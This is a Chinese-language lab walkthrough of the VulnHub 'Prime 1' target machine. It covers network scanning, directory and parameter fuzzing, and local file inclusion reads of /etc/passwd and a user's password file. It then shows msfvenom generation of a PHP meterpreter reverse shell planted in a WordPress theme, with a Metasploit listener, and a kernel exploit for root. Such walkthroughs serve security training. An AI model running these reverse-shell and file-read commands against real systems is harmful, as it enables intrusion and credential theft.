prime_series_level-1靶场详解

news2025/2/27 8:44:00

环境搭建

官网https://www.vulnhub.com/entry/prime-1,358/

直接导入靶机

解题思路

arp-scan -l

确认靶机ip为192.168.236.136

也可以使用nmap扫网段

nmap -sn 192.168.236.0/24

使用nmap扫描靶机开放的端口

nmap -sS -T5 --min-rate 10000 192.168.236.136 -sC -p- (速度较快,内容少)我习惯性这个

nmap -A -sV -T4 -p- 192.168.236.136 内容较多,速度慢

开放了22和80端口

访问80端口,查看源码也没有任何信息

使用dirb扫描目录

当然还可以使用御剑,dirsearch等

dirb http://192.168.236.136/

访问一下http://192.168.236.136/dev和http://192.168.236.136/wordpress

访问wordpress

尝试过滤扫描dirb http://192.168.236.136 -X .txt,.php,zip

 

尝试访问这三个文件:index.php,image.php,secret.txt

提示说要找到location.txt才能进行下一步

使用wfuzz工具爆破传参数

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.236.136/index.php?FUZZ

发现长度宽度都一样

使用wfuzz过滤出不同的值

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.236.136/index.php?FUZZ

直接访问/index.php?file=location.txt

curl http://192.168.236.136/index.php?file=location.txt

提示显示:secrettier360是正确的参数,file只是过渡而已

尝试curl http://192.168.236.136/index.php?secrettier360=aaa

curl http://192.168.236.136/image.php?secrettier360=aaa试试

提示说找到了正确的参数

使用curl http://192.168.236.136/image.php?secrettier360=/etc/passwd读取敏感文件

后面提示说找password.txt,并且在/home/saket里面

刚才只扫到一个index.php和一个image.php所以这里只能利用image.php

使用curl http://192.168.236.136/image.php?secrettier360=/home/saket/password.txt

给了一串特殊字符follow_the_ippsec猜测是密码

尝试ssh登录:ssh -p 22 victor@192.168.236.136

ssh登录失败,尝试其他登录方式

使用前面扫描出来的wordpress登录试试

使用cmseek搜集web指纹信息

cmseek -u http://192.168.236.136/wordpress/

或者使用wpscan扫描wordpress

wpscan --url http://192.168.236.136/wordpress/ --enumerate u

显示只有一个用户victor

登录wordpress

登录成功

找后门上传点

利用msfMsfvenom命令总结大全中已有payload(php/meterpreter/reverse_tcp)生成shell.php。打开shell.php文件,将内容复制到secret.php中。

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.236.128 lport=7777 -o shell.php
      -p选择相应payload
      lhost=本地IP
      lport=监听端口
      -o 指定输出文件的位置

将secret.php文件上传成功后,使用msf见天模块(exploit/multi/handler),设置lhost和lport和payload(php/meterpreter/reverse_tcp),开启监听后,浏览器打开secret.php页面。

要和生成的payload对应一致

使用msfconsole

使用监听模块 use exploit/multi/handler

跟之前生成payload的对应 set payload php/meterpreter/reverse_tcp

设置自己ip set lhost 192.168.236.128

设置端口 set lport 7777

开始监听 run和exploit都可以

让网站触发这个php反弹shell

访问这个文件

wordpress文件都在这个路径下

http://192.168.236.136/wordpress/wp-content/themes/twentynineteen/secret.php

打开msfconsole查看漏洞数据库

使用searchsploit 16.04 Ubuntu查找

发现只有这个符合,并且给了提权脚本

在msf数据漏洞库下载45010.c的提权脚本

msf脚本数据库路径/usr/share/exploitdb/exploits/linux/local

将脚本copy下来,使用gcc编译

上传45010

upload /root/45010(本机文件) /tmp/45010(靶机root目录)

发现版本报错glibc的版本不对(glibc是linux系统中最底层的api,几乎其它任何运行库都会依赖于glibc)

两个方法,要么kali下载对应版本(主要是我kali刚刚更新) ,要么升级Ubuntu的glibc版本(本来就是渗透进去的)

我选择第三种方法,找一个以前版本的kali 2021,就可以解决了。

查看root下的root.txt文件得到flag

知识点:

1、扫描局域网内的网段主机

2、扫描端口获得运行的服务

3、扫描目录获得关键信息

4、本地文件包含漏洞LF刊

5、fuzz获得正确的参数

6、wordpress漏洞利用

7、msfvenom:生成反弹shell

8、Ubuntu内核漏洞提权

内网渗透思路框架图_内网渗透路线图-CSDN博客

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1473527.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

ABBYY FineReader16文档转换、PDF管理与文档比较功能介绍

ABBYY FineReader 16作为一款OCR和PDF一体化程序,其强大的功能使得文档处理变得简单高效。在众多功能中,文档转换、PDF管理和文档比较这三大功能尤为突出,成为了众多企业和个人用户的首选工具。 ABBYY Finereader 16-安装包下载如下&#xff…

好书推荐丨AI绘画全面精通:软件平台+脚本文案+设计制作+案例实战

文章目录 写在前面AI绘画推荐图书图书简介本书特色作者简介 推荐理由粉丝福利写在后面 写在前面 本期博主给大家带来了一本全新出版的AI绘画类书籍,《AI绘画全面精通:软件平台脚本文案设计制作案例实战》,对人工智能感兴趣的小伙伴快来看看吧…

什么时候要用到Reflect API?

参考文档 https://www.zhihu.com/question/460133198 https://cn.vuejs.org/guide/extras/reactivity-in-depth.html https://juejin.cn/post/7103764386220769311 Reflect API 一般搭配 Proxy API 一起使用。什么是 Proxy API 呢? 先回顾下 vue 的数据响应性是如何…

27-树-左叶子之和

这是树的第27篇算法,力扣链接。 给定二叉树的根节点 root ,返回所有左叶子之和。 示例 1: 输入: root [3,9,20,null,null,15,7] 输出: 24 解释: 在这个二叉树中,有两个左叶子,分别是 9 和 15,所以返回 2…

前后端项目宝塔linux部署(springboot,vue,python)

宝塔linux安装就省略了,网上一堆 1.部署后端 1.首先把自己项目里面打包好的的jar包上传到服务器随便一个地方,我这里就上传到www/wwwroot下面了,宝塔的文件页面可以很便携上传 2.然后到下面这个页面 选那个java环境管理装个jdk&#xff…

在github的README.md中插入视频;在github的README.md中添加gif演示动画

最近需要再github中上传项目的源代码,应导师的要求,需要再README中加入对实验视频的展示,但是github的README.md其实就是一个markdown文件,据我的理解这个文件里应该无法直接插入视频吧?(如果后续有办法直接…

【postgresql】数据表id自增与python sqlachemy结合实例

需求: postgresql实现一个建表语句,表名:student,字段id,name,age, 要求:每次添加一个数据id会自动增加1 在PostgreSQL中,您可以使用SERIAL或BIGSERIAL数据类型来自动生成主键ID。以下是一个创建名为stude…

2024环境,资源与绿色能源国际会议(ICERGE2024)

2024环境,资源与绿色能源国际会议(ICERGE2024) 一、【会议简介】 2024环境、资源与绿色能源国际会议(ICERGE2024)将于2024年在三亚举行。该会议是一个围绕环境、资源与绿色能源研究领域的国际学术交流活动。 会议主题包括但不限于环境科学、环境工程、资源利用、绿…

C++之类和对象(2)

目录 1.类的6个默认成员函数 2. 构造函数 2.1 概念 2.2 特性 3.析构函数 3.1 概念 3.2 特性 4. 拷贝构造函数 4.1 概念 4.2 特征 5.赋值运算符重载 5.1 运算符重载 5.2 赋值运算符重载 2. 赋值运算符只能重载成类的成员函数不能重载成全局函数 3. 用户没有显式实现时&…

pycharm如何安装pygame库

pycharm如何安装pygame库 PyCharm是Python中广受欢迎的一种IDE,它可以为用户提供许多工具和便利的服务,从而大大提高开发效率。pygame库可以用python进行游戏开发提供很好的支持,那么在ptcharm中如何安装pygame库呢? 一、安装步…

Sora背后的技术原理解析(简单易懂版本)

本篇文章是OpenAI发布的最强AI视频生成工具Sora技术详解(非官方),然而,Sora的野心远不止是视频生成,而是作为一个世界模型。之前的文章中已经介绍了很多关于文生图的相关技术,相信有了文生图的基础后再来学…

[c/c++] static 关键字

从修饰的对象来看,static 可以修饰局部变量,也可以修饰全局变量,可以修饰函数;可以修饰类中的成员变量以及成员函数。 从生命周期的角度来看,static 修饰的对象的生命周期,与进程的生命周期是一致的。 从…

大话设计模式——3.建造者模式(Builder Pattern)

1.定义: 将一个复杂对象的构建与它的表示分离,使得同样的构建过程可以创建不同的表示。UML图 2.示例: 汽车或者电脑的组装可以采用构造者模式进行设计,如汽车的引擎或者轮胎,电脑的处理器、内存、主板等都可以进行…

【Java设计模式】四、适配器模式

文章目录 1、适配器模式2、举例 1、适配器模式 适配器模式Adapter Pattern,是做为两个不兼容的接口之间的桥梁目的是将一个类的接口转换成客户希望的另外一个接口适配器模式可以使得原本由于接口不兼容而不能一起工作的那些类可以一起工作 最后,适配器…

【51单片机】红外遥控红外遥控电机调速(江科大)

1.红外遥控简介 红外遥控是利用红外光进行通信的设备,由红外LED将调制后的信号发出,由专用的红外接收头进行解调输出 通信方式:单工,异步 红外LED波长:940nm 通信协议标准:NEC标准 2.硬件电路 红外发送部分 IN高电平时,LED不亮,IN低电平时&…

Langchain-Chatchat:离线运行的大模型知识库 | 开源日报 No.182

chatchat-space/Langchain-Chatchat Stars: 22k License: Apache-2.0 基于 ChatGLM 等大语言模型与 Langchain 等应用框架实现的开源、可离线部署的检索增强生成 (RAG) 大模型知识库项目。该项目是一个可以实现完全本地化推理的知识库增强方案,重点解决数据安全保护…

【C语言】linux内核netdev_start_xmit函数

一、中文注释 static inline netdev_tx_t netdev_start_xmit(struct sk_buff *skb, struct net_device *dev, struct netdev_queue *txq, bool more) {// 获取网络设备操作集合const struct net_device_ops *ops dev->netdev_ops;int rc;// 调用实际发送数据包的函数&…

RCS-YOLO:检测头和网络结构的改进

目录 摘要 原理 总体结构图 RCS模块原理 代码实现 RCS-Based One-Shot Aggregation 代码实现 检测头改进 手动计算anchor代码 yaml文件 已详细修改的代码 程序启动命令 可论文指导 V ------------> jiabei-545 往期推荐 摘要 凭借速度和准确性之间的出色平…

学习笔记-李沐动手学深度学习(七)(19-21,卷积层、填充padding、步幅stride、多输入多输出通道)

总结 19-卷积层 【补充】看评论区建议的卷积动画视频 数学中的卷积 【链接】https://www.bilibili.com/video/BV1VV411478E/?fromsearch&seid1725700777641154181&vd_sourcee81e116c4ffe5e79d4bc44738263eda4 【可判断是否为卷积的典型标志】两个函数中自变量相加…

瑞_Redis_Redis客户端

文章目录 1 Redis客户端1.1 Redis命令行客户端1.2 图形化桌面客户端1.2.1 资源准备1.2.2 安装1.2.3 建立连接 🙊 前言:本文章为瑞_系列专栏之《Redis》的基础篇的Redis客户端章节。由于博主是从B站黑马程序员的《Redis》学习其相关知识,所以本…